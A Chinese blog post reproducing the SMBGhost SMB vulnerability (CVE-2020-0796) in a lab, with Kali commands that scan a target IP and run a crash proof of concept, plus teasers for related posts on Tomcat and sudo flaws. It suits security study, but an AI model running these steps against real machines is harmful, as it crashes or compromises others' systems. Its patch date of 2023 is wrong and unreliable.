CVE 2020 0796漏洞復現 藍屏警告

2021-10-09 14:57:40 字數 1744 閱讀 2047

cve-2020-0796簡介

微軟3月11日發布3月例行更新,其中並未公布編號為cve-2020-0796的高危漏洞資料,

但該漏洞卻最為引人注目。次日晚(2023年3月12日)微軟正式發布cve-2020-0796高危漏洞補丁。

該漏洞的後果十分接近永恆之藍系列,都利用windows smb漏洞遠端攻擊獲取系統最高許可權,

wannacry勒索蠕蟲就是利用永恆之藍系列漏洞攻擊工具製造的大災難。

除了直接攻擊smb服務端造成rce外,

該漏洞得亮點在於對smb客戶端的攻擊,

擊者可以構造特定的網頁,壓縮包,共享目錄,office文件等多種方式觸發漏洞進行攻擊

漏洞影響版本

漏洞不影響win7,漏洞影響windows 10 1903之後的各個32位、64位版windows,包括家用版、專業版、企業版、教育版。

windows 10 version 1903 for 32-bit systems

windows 10 version 1903 for x64-based systems

windows 10 version 1903 for arm64-based systems

windows server, version 1903 (server core installation)

windows 10 version 1909 for 32-bit systems

windows 10 version 1909 for x64-based systems

windows 10 version 1909 for arm64-based systems

windows server, version 1909 (server core installation)

**攻擊配置(安裝smbghost)**

root@kali:~/桌面# mkdir cve-2020-0796

root@kali:~/桌面# cd cve-2020-0796

root@kali:~/桌面/cve-2020-0796#

root@kali:~# git clone 安裝smbghost

root@kali:~/桌面/cve-2020-0796# cd smbghost

root@kali:~/桌面/cve-2020-0796/smbghost# python3 scanner.py 192.168.100.130 掃瞄是否存在漏洞

192.168.100.130 vulnerable 發現漏洞

**安裝impacke**

root@kali:~/桌面/cve-2020-0796# git clone 安裝impacke

root@kali:~/桌面/cve-2020-0796# cd impacket

root@kali:~/桌面/cve-2020-0796/impacket# python3 setup.py install

root@kali:~/桌面/cve-2020-0796# git clone 安裝poc

root@kali:~/桌面/cve-2020-0796# cd smbghost_crash_poc

root@kali:~/桌面/cve-2020-0796/smbghost_crash_poc# python3 gistfile1.py 192.168.100.130 攻擊

CVE 2020 0796 漏洞檢測及利用工具

windows 10 version 1903 for 32 bit systems windows 10 version 1903 for x64 based systems windows 10 version 1903 for arm64 based systems windows serve...

漏洞復現 CVE 2020 1938漏洞復現

tomcat connector 是 tomcat 與外界連線的通道,使得它與 catalina 能夠接收外部的請求,傳遞給對應的 web 應用程式處理,並返回對應的請求結果。http connector就是用來提供經常用到的http web服務,而ajp connector使用的ajp協議 apa...

CVE 2019 14287 漏洞復現

etc sudoers檔案配置不當,導致使用者可以繞過安全策略,以root身份執行命令。預設情況下的linux,不會遭受此攻擊 開啟linux中 etc sudoers,預設情況下如下圖所示。這是什麼意思呢?如果這樣配置,就允許test使用者以非root使用者之外的所有使用者許可權執行id這個命令。...